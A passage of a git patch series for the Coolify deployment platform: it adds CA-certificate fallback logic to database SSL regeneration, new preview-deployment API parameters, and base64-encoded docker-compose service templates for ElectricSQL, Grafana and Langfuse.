diff --git a/tests/v4/Browser/DashboardTest.php b/tests/v4/Browser/DashboardTest.php
index b4a97f268..233b0db9d 100644
--- a/tests/v4/Browser/DashboardTest.php
+++ b/tests/v4/Browser/DashboardTest.php
@@ -77,21 +77,21 @@
         ],
     ]);
 
-    Project::create([
+    Project::forceCreate([
         'uuid' => 'project-1',
         'name' => 'My first project',
         'description' => 'This is a test project in development',
         'team_id' => 0,
     ]);
 
-    Project::create([
+    Project::forceCreate([
         'uuid' => 'project-2',
         'name' => 'Production API',
         'description' => 'Backend services for production',
         'team_id' => 0,
     ]);
 
-    Project::create([
+    Project::forceCreate([
         'uuid' => 'project-3',
         'name' => 'Staging Environment',
         'description' => 'Staging and QA testing',

From 850c37beddf6356778fbbf0bd5c1a0c0d3163e87 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Mon, 30 Mar 2026 13:10:49 +0200
Subject: [PATCH 201/213] fix(database): auto-generate missing CA cert on SSL
 regeneration

Prevent null CA certificate access during database SSL certificate regeneration
across KeyDB, MariaDB, MongoDB, MySQL, PostgreSQL, and Redis components.

If no CA certificate exists, attempt to generate one and re-query; if still
missing, dispatch a clear error and stop regeneration gracefully.

Add `SslCertificateRegenerationTest` coverage for missing-CA and CA-query
scenarios to prevent regressions.
---
 .../Project/Database/Keydb/General.php        | 11 +++
 .../Project/Database/Mariadb/General.php      | 11 +++
 .../Project/Database/Mongodb/General.php      | 11 +++
 .../Project/Database/Mysql/General.php        | 11 +++
 .../Project/Database/Postgresql/General.php   | 11 +++
 .../Project/Database/Redis/General.php        | 11 +++
 openapi.json                                  | 23 +++++-
 openapi.yaml                                  | 18 +++-
 templates/service-templates-latest.json       | 24 +++++-
 templates/service-templates.json              | 20 ++++-
 .../SslCertificateRegenerationTest.php        | 82 +++++++++++++++++++
 11 files changed, 223 insertions(+), 10 deletions(-)
 create mode 100644 tests/Feature/SslCertificateRegenerationTest.php

diff --git a/app/Livewire/Project/Database/Keydb/General.php b/app/Livewire/Project/Database/Keydb/General.php
index adb4ccb5f..be30b96f2 100644
--- a/app/Livewire/Project/Database/Keydb/General.php
+++ b/app/Livewire/Project/Database/Keydb/General.php
@@ -269,6 +269,17 @@ public function regenerateSslCertificate()
                 ->where('is_ca_certificate', true)
                 ->first();
 
+            if (! $caCert) {
+                $this->server->generateCaCertificate();
+                $caCert = $this->server->sslCertificates()->where('is_ca_certificate', true)->first();
+            }
+
+            if (! $caCert) {
+                $this->dispatch('error', 'No CA certificate found for this database. Please generate a CA certificate for this server in the server/advanced page.');
+
+                return;
+            }
+
             SslHelper::generateSslCertificate(
                 commonName: $existingCert->commonName,
                 subjectAlternativeNames: $existingCert->subjectAlternativeNames ?? [],
diff --git a/app/Livewire/Project/Database/Mariadb/General.php b/app/Livewire/Project/Database/Mariadb/General.php
index 14240c82d..6dc89e97a 100644
--- a/app/Livewire/Project/Database/Mariadb/General.php
+++ b/app/Livewire/Project/Database/Mariadb/General.php
@@ -289,6 +289,17 @@ public function regenerateSslCertificate()
 
             $caCert = $this->server->sslCertificates()->where('is_ca_certificate', true)->first();
 
+            if (! $caCert) {
+                $this->server->generateCaCertificate();
+                $caCert = $this->server->sslCertificates()->where('is_ca_certificate', true)->first();
+            }
+
+            if (! $caCert) {
+                $this->dispatch('error', 'No CA certificate found for this database. Please generate a CA certificate for this server in the server/advanced page.');
+
+                return;
+            }
+
             SslHelper::generateSslCertificate(
                 commonName: $existingCert->common_name,
                 subjectAlternativeNames: $existingCert->subject_alternative_names ?? [],
diff --git a/app/Livewire/Project/Database/Mongodb/General.php b/app/Livewire/Project/Database/Mongodb/General.php
index 11419ec71..9d0462197 100644
--- a/app/Livewire/Project/Database/Mongodb/General.php
+++ b/app/Livewire/Project/Database/Mongodb/General.php
@@ -297,6 +297,17 @@ public function regenerateSslCertificate()
 
             $caCert = $this->server->sslCertificates()->where('is_ca_certificate', true)->first();
 
+            if (! $caCert) {
+                $this->server->generateCaCertificate();
+                $caCert = $this->server->sslCertificates()->where('is_ca_certificate', true)->first();
+            }
+
+            if (! $caCert) {
+                $this->dispatch('error', 'No CA certificate found for this database. Please generate a CA certificate for this server in the server/advanced page.');
+
+                return;
+            }
+
             SslHelper::generateSslCertificate(
                 commonName: $existingCert->common_name,
                 subjectAlternativeNames: $existingCert->subject_alternative_names ?? [],
diff --git a/app/Livewire/Project/Database/Mysql/General.php b/app/Livewire/Project/Database/Mysql/General.php
index 4f0f5eb19..2ac202250 100644
--- a/app/Livewire/Project/Database/Mysql/General.php
+++ b/app/Livewire/Project/Database/Mysql/General.php
@@ -301,6 +301,17 @@ public function regenerateSslCertificate()
 
             $caCert = $this->server->sslCertificates()->where('is_ca_certificate', true)->first();
 
+            if (! $caCert) {
+                $this->server->generateCaCertificate();
+                $caCert = $this->server->sslCertificates()->where('is_ca_certificate', true)->first();
+            }
+
+            if (! $caCert) {
+                $this->dispatch('error', 'No CA certificate found for this database. Please generate a CA certificate for this server in the server/advanced page.');
+
+                return;
+            }
+
             SslHelper::generateSslCertificate(
                 commonName: $existingCert->common_name,
                 subjectAlternativeNames: $existingCert->subject_alternative_names ?? [],
diff --git a/app/Livewire/Project/Database/Postgresql/General.php b/app/Livewire/Project/Database/Postgresql/General.php
index 4e044672b..e43424b9a 100644
--- a/app/Livewire/Project/Database/Postgresql/General.php
+++ b/app/Livewire/Project/Database/Postgresql/General.php
@@ -264,6 +264,17 @@ public function regenerateSslCertificate()
 
             $caCert = $this->server->sslCertificates()->where('is_ca_certificate', true)->first();
 
+            if (! $caCert) {
+                $this->server->generateCaCertificate();
+                $caCert = $this->server->sslCertificates()->where('is_ca_certificate', true)->first();
+            }
+
+            if (! $caCert) {
+                $this->dispatch('error', 'No CA certificate found for this database. Please generate a CA certificate for this server in the server/advanced page.');
+
+                return;
+            }
+
             SslHelper::generateSslCertificate(
                 commonName: $existingCert->common_name,
                 subjectAlternativeNames: $existingCert->subject_alternative_names ?? [],
diff --git a/app/Livewire/Project/Database/Redis/General.php b/app/Livewire/Project/Database/Redis/General.php
index ebe2f3ba0..9a132cc37 100644
--- a/app/Livewire/Project/Database/Redis/General.php
+++ b/app/Livewire/Project/Database/Redis/General.php
@@ -282,6 +282,17 @@ public function regenerateSslCertificate()
 
             $caCert = $this->server->sslCertificates()->where('is_ca_certificate', true)->first();
 
+            if (! $caCert) {
+                $this->server->generateCaCertificate();
+                $caCert = $this->server->sslCertificates()->where('is_ca_certificate', true)->first();
+            }
+
+            if (! $caCert) {
+                $this->dispatch('error', 'No CA certificate found for this database. Please generate a CA certificate for this server in the server/advanced page.');
+
+                return;
+            }
+
             SslHelper::generateSslCertificate(
                 commonName: $existingCert->commonName,
                 subjectAlternativeNames: $existingCert->subjectAlternativeNames ?? [],
diff --git a/openapi.json b/openapi.json
index 277f485f9..ed8decb48 100644
--- a/openapi.json
+++ b/openapi.json
@@ -2722,8 +2722,7 @@
                                     },
                                     "is_preserve_repository_enabled": {
                                         "type": "boolean",
-                                        "default": false,
-                                        "description": "Preserve repository during deployment."
+                                        "description": "Preserve git repository during application update. If false, the existing repository will be removed and replaced with the new one. If true, the existing repository will be kept and the new one will be ignored. Default is false."
                                     }
                                 },
                                 "type": "object"
@@ -7275,6 +7274,22 @@
                         "schema": {
                             "type": "integer"
                         }
+                    },
+                    {
+                        "name": "pull_request_id",
+                        "in": "query",
+                        "description": "Preview deployment identifier. Alias of pr.",
+                        "schema": {
+                            "type": "integer"
+                        }
+                    },
+                    {
+                        "name": "docker_tag",
+                        "in": "query",
+                        "description": "Docker image tag for Docker Image preview deployments. Requires pull_request_id.",
+                        "schema": {
+                            "type": "string"
+                        }
                     }
                 ],
                 "responses": {
@@ -12735,6 +12750,10 @@
                     "pull_request_id": {
                         "type": "integer"
                     },
+                    "docker_registry_image_tag": {
+                        "type": "string",
+                        "nullable": true
+                    },
                     "force_rebuild": {
                         "type": "boolean"
                     },
diff --git a/openapi.yaml b/openapi.yaml
index 9475364b6..157cd9f69 100644
--- a/openapi.yaml
+++ b/openapi.yaml
@@ -1755,8 +1755,7 @@ paths:
                   description: 'Escape special characters in labels. By default, $ (and other chars) is escaped. So if you write $ in the labels, it will be saved as $$. If you want to use env variables inside the labels, turn this off.'
                 is_preserve_repository_enabled:
                   type: boolean
-                  default: false
-                  description: 'Preserve repository during deployment.'
+                  description: 'Preserve git repository during application update. If false, the existing repository will be removed and replaced with the new one. If true, the existing repository will be kept and the new one will be ignored. Default is false.'
               type: object
       responses:
         '200':
@@ -4711,6 +4710,18 @@ paths:
           description: 'Pull Request Id for deploying specific PR builds. Cannot be used with tag parameter.'
           schema:
             type: integer
+        -
+          name: pull_request_id
+          in: query
+          description: 'Preview deployment identifier. Alias of pr.'
+          schema:
+            type: integer
+        -
+          name: docker_tag
+          in: query
+          description: 'Docker image tag for Docker Image preview deployments. Requires pull_request_id.'
+          schema:
+            type: string
       responses:
         '200':
           description: "Get deployment(s) UUID's"
@@ -8106,6 +8117,9 @@ components:
           type: string
         pull_request_id:
           type: integer
+        docker_registry_image_tag:
+          type: string
+          nullable: true
         force_rebuild:
           type: boolean
         commit:
diff --git a/templates/service-templates-latest.json b/templates/service-templates-latest.json
index 51cb39de0..590d0ab64 100644
--- a/templates/service-templates-latest.json
+++ b/templates/service-templates-latest.json
@@ -1102,6 +1102,22 @@
         "minversion": "0.0.0",
         "port": "9200"
     },
+    "electricsql": {
+        "documentation": "https://electric-sql.com/docs/guides/deployment?utm_source=coolify.io",
+        "slogan": "Sync shape-based subsets of your Postgres data over HTTP.",
+        "compose": "c2VydmljZXM6CiAgZWxlY3RyaWM6CiAgICBpbWFnZTogJ2VsZWN0cmljc3FsL2VsZWN0cmljOjEuNC4yJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9VUkxfRUxFQ1RSSUNfMzAwMAogICAgICAtICdEQVRBQkFTRV9VUkw9JHtEQVRBQkFTRV9VUkw6P30nCiAgICAgIC0gJ0VMRUNUUklDX1NFQ1JFVD0ke1NFUlZJQ0VfUEFTU1dPUkRfNjRfRUxFQ1RSSUN9JwogICAgICAtIEVMRUNUUklDX1NUT1JBR0VfRElSPS9hcHAvcGVyc2lzdGVudAogICAgICAtICdFTEVDVFJJQ19VU0FHRV9SRVBPUlRJTkc9JHtFTEVDVFJJQ19VU0FHRV9SRVBPUlRJTkc6LWZhbHNlfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2VsZWN0cmljX2RhdGE6L2FwcC9wZXJzaXN0ZW50JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIGN1cmwKICAgICAgICAtICctZicKICAgICAgICAtICdodHRwOi8vMTI3LjAuMC4xOjMwMDAvdjEvaGVhbHRoJwogICAgICBpbnRlcnZhbDogMTBzCiAgICAgIHRpbWVvdXQ6IDVzCiAgICAgIHJldHJpZXM6IDUK",
+        "tags": [
+            "electric",
+            "electricsql",
+            "realtime",
+            "sync",
+            "postgresql"
+        ],
+        "category": "backend",
+        "logo": "svgs/electricsql.svg",
+        "minversion": "0.0.0",
+        "port": "3000"
+    },
     "emby": {
         "documentation": "https://emby.media/support/articles/Home.html?utm_source=coolify.io",
         "slogan": "A media server software that allows you to organize, stream, and access your multimedia content effortlessly.",
@@ -1847,7 +1863,7 @@
     "grafana-with-postgresql": {
         "documentation": "https://grafana.com?utm_source=coolify.io",
         "slogan": "Grafana is the open source analytics & monitoring solution for every database.",
-        "compose": "c2VydmljZXM6CiAgZ3JhZmFuYToKICAgIGltYWdlOiBncmFmYW5hL2dyYWZhbmEtb3NzCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWSUNFX1VSTF9HUkFGQU5BXzMwMDAKICAgICAgLSAnR0ZfU0VSVkVSX1JPT1RfVVJMPSR7U0VSVklDRV9VUkxfR1JBRkFOQX0nCiAgICAgIC0gJ0dGX1NFUlZFUl9ET01BSU49JHtTRVJWSUNFX1VSTF9HUkFGQU5BfScKICAgICAgLSAnR0ZfU0VDVVJJVFlfQURNSU5fUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX0dSQUZBTkF9JwogICAgICAtIEdGX0RBVEFCQVNFX1RZUEU9cG9zdGdyZXMKICAgICAgLSBHRl9EQVRBQkFTRV9IT1NUPXBvc3RncmVzcWwKICAgICAgLSBHRl9EQVRBQkFTRV9VU0VSPSRTRVJWSUNFX1VTRVJfUE9TVEdSRVMKICAgICAgLSBHRl9EQVRBQkFTRV9QQVNTV09SRD0kU0VSVklDRV9QQVNTV09SRF9QT1NUR1JFUwogICAgICAtICdHRl9EQVRBQkFTRV9OQU1FPSR7UE9TVEdSRVNfREI6LWdyYWZhbmF9JwogICAgdm9sdW1lczoKICAgICAgLSAnZ3JhZmFuYS1kYXRhOi92YXIvbGliL2dyYWZhbmEnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gY3VybAogICAgICAgIC0gJy1mJwogICAgICAgIC0gJ2h0dHA6Ly8xMjcuMC4wLjE6MzAwMC9hcGkvaGVhbHRoJwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogMjBzCiAgICAgIHJldHJpZXM6IDEwCiAgICBkZXBlbmRzX29uOgogICAgICAtIHBvc3RncmVzcWwKICBwb3N0Z3Jlc3FsOgogICAgaW1hZ2U6ICdwb3N0Z3JlczoxNi1hbHBpbmUnCiAgICB2b2x1bWVzOgogICAgICAtICdwb3N0Z3Jlc3FsLWRhdGE6L3Zhci9saWIvcG9zdGdyZXNxbC9kYXRhJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gUE9TVEdSRVNfVVNFUj0kU0VSVklDRV9VU0VSX1BPU1RHUkVTCiAgICAgIC0gUE9TVEdSRVNfUEFTU1dPUkQ9JFNFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVMKICAgICAgLSAnUE9TVEdSRVNfREI9JHtQT1NUR1JFU19EQjotZ3JhZmFuYX0nCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ3BnX2lzcmVhZHkgLVUgJCR7UE9TVEdSRVNfVVNFUn0gLWQgJCR7UE9TVEdSRVNfREJ9JwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogMjBzCiAgICAgIHJldHJpZXM6IDEwCg==",
+        "compose": "c2VydmljZXM6CiAgZ3JhZmFuYToKICAgIGltYWdlOiBncmFmYW5hL2dyYWZhbmEtb3NzCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWSUNFX1VSTF9HUkFGQU5BXzMwMDAKICAgICAgLSAnR0ZfU0VSVkVSX1JPT1RfVVJMPSR7U0VSVklDRV9VUkxfR1JBRkFOQX0nCiAgICAgIC0gJ0dGX1NFUlZFUl9ET01BSU49JHtTRVJWSUNFX0ZRRE5fR1JBRkFOQX0nCiAgICAgIC0gJ0dGX1NFQ1VSSVRZX0FETUlOX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9HUkFGQU5BfScKICAgICAgLSBHRl9EQVRBQkFTRV9UWVBFPXBvc3RncmVzCiAgICAgIC0gR0ZfREFUQUJBU0VfSE9TVD1wb3N0Z3Jlc3FsCiAgICAgIC0gR0ZfREFUQUJBU0VfVVNFUj0kU0VSVklDRV9VU0VSX1BPU1RHUkVTCiAgICAgIC0gR0ZfREFUQUJBU0VfUEFTU1dPUkQ9JFNFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVMKICAgICAgLSAnR0ZfREFUQUJBU0VfTkFNRT0ke1BPU1RHUkVTX0RCOi1ncmFmYW5hfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2dyYWZhbmEtZGF0YTovdmFyL2xpYi9ncmFmYW5hJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIGN1cmwKICAgICAgICAtICctZicKICAgICAgICAtICdodHRwOi8vMTI3LjAuMC4xOjMwMDAvYXBpL2hlYWx0aCcKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAogICAgZGVwZW5kc19vbjoKICAgICAgLSBwb3N0Z3Jlc3FsCiAgcG9zdGdyZXNxbDoKICAgIGltYWdlOiAncG9zdGdyZXM6MTYtYWxwaW5lJwogICAgdm9sdW1lczoKICAgICAgLSAncG9zdGdyZXNxbC1kYXRhOi92YXIvbGliL3Bvc3RncmVzcWwvZGF0YScKICAgIGVudmlyb25tZW50OgogICAgICAtIFBPU1RHUkVTX1VTRVI9JFNFUlZJQ0VfVVNFUl9QT1NUR1JFUwogICAgICAtIFBPU1RHUkVTX1BBU1NXT1JEPSRTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTCiAgICAgIC0gJ1BPU1RHUkVTX0RCPSR7UE9TVEdSRVNfREI6LWdyYWZhbmF9JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICdwZ19pc3JlYWR5IC1VICQke1BPU1RHUkVTX1VTRVJ9IC1kICQke1BPU1RHUkVTX0RCfScKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAo=",
         "tags": [
             "grafana",
             "analytics",
@@ -1862,7 +1878,7 @@
     "grafana": {
         "documentation": "https://grafana.com?utm_source=coolify.io",
         "slogan": "Grafana is the open source analytics & monitoring solution for every database.",
-        "compose": "c2VydmljZXM6CiAgZ3JhZmFuYToKICAgIGltYWdlOiBncmFmYW5hL2dyYWZhbmEtb3NzCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWSUNFX1VSTF9HUkFGQU5BXzMwMDAKICAgICAgLSAnR0ZfU0VSVkVSX1JPT1RfVVJMPSR7U0VSVklDRV9VUkxfR1JBRkFOQX0nCiAgICAgIC0gJ0dGX1NFUlZFUl9ET01BSU49JHtTRVJWSUNFX1VSTF9HUkFGQU5BfScKICAgICAgLSAnR0ZfU0VDVVJJVFlfQURNSU5fUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX0dSQUZBTkF9JwogICAgdm9sdW1lczoKICAgICAgLSAnZ3JhZmFuYS1kYXRhOi92YXIvbGliL2dyYWZhbmEnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gY3VybAogICAgICAgIC0gJy1mJwogICAgICAgIC0gJ2h0dHA6Ly8xMjcuMC4wLjE6MzAwMC9hcGkvaGVhbHRoJwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogMjBzCiAgICAgIHJldHJpZXM6IDEwCg==",
+        "compose": "c2VydmljZXM6CiAgZ3JhZmFuYToKICAgIGltYWdlOiBncmFmYW5hL2dyYWZhbmEtb3NzCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWSUNFX1VSTF9HUkFGQU5BXzMwMDAKICAgICAgLSAnR0ZfU0VSVkVSX1JPT1RfVVJMPSR7U0VSVklDRV9VUkxfR1JBRkFOQX0nCiAgICAgIC0gJ0dGX1NFUlZFUl9ET01BSU49JHtTRVJWSUNFX0ZRRE5fR1JBRkFOQX0nCiAgICAgIC0gJ0dGX1NFQ1VSSVRZX0FETUlOX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9HUkFGQU5BfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2dyYWZhbmEtZGF0YTovdmFyL2xpYi9ncmFmYW5hJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIGN1cmwKICAgICAgICAtICctZicKICAgICAgICAtICdodHRwOi8vMTI3LjAuMC4xOjMwMDAvYXBpL2hlYWx0aCcKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAo=",
         "tags": [
             "grafana",
             "analytics",
@@ -2356,7 +2372,7 @@
     "langfuse": {
         "documentation": "https://langfuse.com/docs?utm_source=coolify.io",
         "slogan": "Langfuse is an open-source LLM engineering platform that helps teams collaboratively debug, analyze, and iterate on their LLM applications.",
-        "compose": "eC1hcHAtZW52OgogIC0gJ05FWFRBVVRIX1VSTD0ke1NFUlZJQ0VfVVJMX0xBTkdGVVNFfScKICAtICdEQVRBQkFTRV9VUkw9cG9zdGdyZXNxbDovLyR7U0VSVklDRV9VU0VSX1BPU1RHUkVTfToke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9QHBvc3RncmVzOjU0MzIvJHtQT1NUR1JFU19EQjotbGFuZ2Z1c2UtZGJ9JwogIC0gJ1NBTFQ9JHtTRVJWSUNFX1BBU1NXT1JEX1NBTFR9JwogIC0gJ0VOQ1JZUFRJT05fS0VZPSR7U0VSVklDRV9QQVNTV09SRF82NF9MQU5HRlVTRX0nCiAgLSAnVEVMRU1FVFJZX0VOQUJMRUQ9JHtURUxFTUVUUllfRU5BQkxFRDotZmFsc2V9JwogIC0gJ0xBTkdGVVNFX0VOQUJMRV9FWFBFUklNRU5UQUxfRkVBVFVSRVM9JHtMQU5HRlVTRV9FTkFCTEVfRVhQRVJJTUVOVEFMX0ZFQVRVUkVTOi1mYWxzZX0nCiAgLSAnQ0xJQ0tIT1VTRV9NSUdSQVRJT05fVVJMPWNsaWNraG91c2U6Ly9jbGlja2hvdXNlOjkwMDAnCiAgLSAnQ0xJQ0tIT1VTRV9VUkw9aHR0cDovL2NsaWNraG91c2U6ODEyMycKICAtICdDTElDS0hPVVNFX1VTRVI9JHtTRVJWSUNFX1VTRVJfQ0xJQ0tIT1VTRX0nCiAgLSAnQ0xJQ0tIT1VTRV9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfQ0xJQ0tIT1VTRX0nCiAgLSBDTElDS0hPVVNFX0NMVVNURVJfRU5BQkxFRD1mYWxzZQogIC0gJ0xBTkdGVVNFX1VTRV9BWlVSRV9CTE9CPSR7TEFOR0ZVU0VfVVNFX0FaVVJFX0JMT0I6LWZhbHNlfScKICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfQlVDS0VUPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0JVQ0tFVDotbGFuZ2Z1c2V9JwogIC0gJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9SRUdJT049JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfUkVHSU9OOi1hdXRvfScKICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfQUNDRVNTX0tFWV9JRD0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9BQ0NFU1NfS0VZX0lEfScKICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfU0VDUkVUX0FDQ0VTU19LRVk9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfU0VDUkVUX0FDQ0VTU19LRVl9JwogIC0gJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9FTkRQT0lOVD0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9FTkRQT0lOVH0nCiAgLSAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0ZPUkNFX1BBVEhfU1RZTEU9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfRk9SQ0VfUEFUSF9TVFlMRTotdHJ1ZX0nCiAgLSAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX1BSRUZJWD0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9QUkVGSVg6LWV2ZW50cy99JwogIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9CVUNLRVQ9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfQlVDS0VUOi1sYW5nZnVzZX0nCiAgLSAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1JFR0lPTj0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9SRUdJT046LWF1dG99JwogIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9BQ0NFU1NfS0VZX0lEPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0FDQ0VTU19LRVlfSUR9JwogIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9TRUNSRVRfQUNDRVNTX0tFWT0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9TRUNSRVRfQUNDRVNTX0tFWX0nCiAgLSAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0VORFBPSU5UPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0VORFBPSU5UfScKICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfRk9SQ0VfUEFUSF9TVFlMRT0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9GT1JDRV9QQVRIX1NUWUxFOi10cnVlfScKICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfUFJFRklYPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1BSRUZJWDotbWVkaWEvfScKICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRU5BQkxFRD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FTkFCTEVEOi1mYWxzZX0nCiAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0JVQ0tFVD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9CVUNLRVQ6LWxhbmdmdXNlfScKICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfUFJFRklYPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1BSRUZJWDotZXhwb3J0cy99JwogIC0gJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9SRUdJT049JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfUkVHSU9OOi1hdXRvfScKICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRU5EUE9JTlQ9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRU5EUE9JTlR9JwogIC0gJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FWFRFUk5BTF9FTkRQT0lOVD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FWFRFUk5BTF9FTkRQT0lOVH0nCiAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0FDQ0VTU19LRVlfSUQ9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfQUNDRVNTX0tFWV9JRH0nCiAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1NFQ1JFVF9BQ0NFU1NfS0VZPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1NFQ1JFVF9BQ0NFU1NfS0VZfScKICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRk9SQ0VfUEFUSF9TVFlMRT0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9GT1JDRV9QQVRIX1NUWUxFOi10cnVlfScKICAtICdMQU5HRlVTRV9JTkdFU1RJT05fUVVFVUVfREVMQVlfTVM9JHtMQU5HRlVTRV9JTkdFU1RJT05fUVVFVUVfREVMQVlfTVM6LTF9JwogIC0gJ0xBTkdGVVNFX0lOR0VTVElPTl9DTElDS0hPVVNFX1dSSVRFX0lOVEVSVkFMX01TPSR7TEFOR0ZVU0VfSU5HRVNUSU9OX0NMSUNLSE9VU0VfV1JJVEVfSU5URVJWQUxfTVM6LTEwMDB9JwogIC0gUkVESVNfSE9TVD1yZWRpcwogIC0gUkVESVNfUE9SVD02Mzc5CiAgLSAnUkVESVNfQVVUSD0ke1NFUlZJQ0VfUEFTU1dPUkRfUkVESVN9JwogIC0gJ0VNQUlMX0ZST01fQUREUkVTUz0ke0VNQUlMX0ZST01fQUREUkVTUzotYWRtaW5AZXhhbXBsZS5jb219JwogIC0gJ1NNVFBfQ09OTkVDVElPTl9VUkw9JHtTTVRQX0NPTk5FQ1RJT05fVVJMOi19JwogIC0gJ05FWFRBVVRIX1NFQ1JFVD0ke1NFUlZJQ0VfQkFTRTY0X05FWFRBVVRIU0VDUkVUfScKICAtICdBVVRIX0RJU0FCTEVfU0lHTlVQPSR7QVVUSF9ESVNBQkxFX1NJR05VUDotdHJ1ZX0nCiAgLSAnSE9TVE5BTUU9JHtIT1NUTkFNRTotMC4wLjAuMH0nCiAgLSAnTEFOR0ZVU0VfSU5JVF9PUkdfSUQ9JHtMQU5HRlVTRV9JTklUX09SR19JRDotbXktb3JnfScKICAtICdMQU5HRlVTRV9JTklUX09SR19OQU1FPSR7TEFOR0ZVU0VfSU5JVF9PUkdfTkFNRTotTXkgT3JnfScKICAtICdMQU5HRlVTRV9JTklUX1BST0pFQ1RfSUQ9JHtMQU5HRlVTRV9JTklUX1BST0pFQ1RfSUQ6LW15LXByb2plY3R9JwogIC0gJ0xBTkdGVVNFX0lOSVRfUFJPSkVDVF9OQU1FPSR7TEFOR0ZVU0VfSU5JVF9QUk9KRUNUX05BTUU6LU15IFByb2plY3R9JwogIC0gJ0xBTkdGVVNFX0lOSVRfVVNFUl9FTUFJTD0ke0xBTkdGVVNFX0lOSVRfVVNFUl9FTUFJTDotYWRtaW5AZXhhbXBsZS5jb219J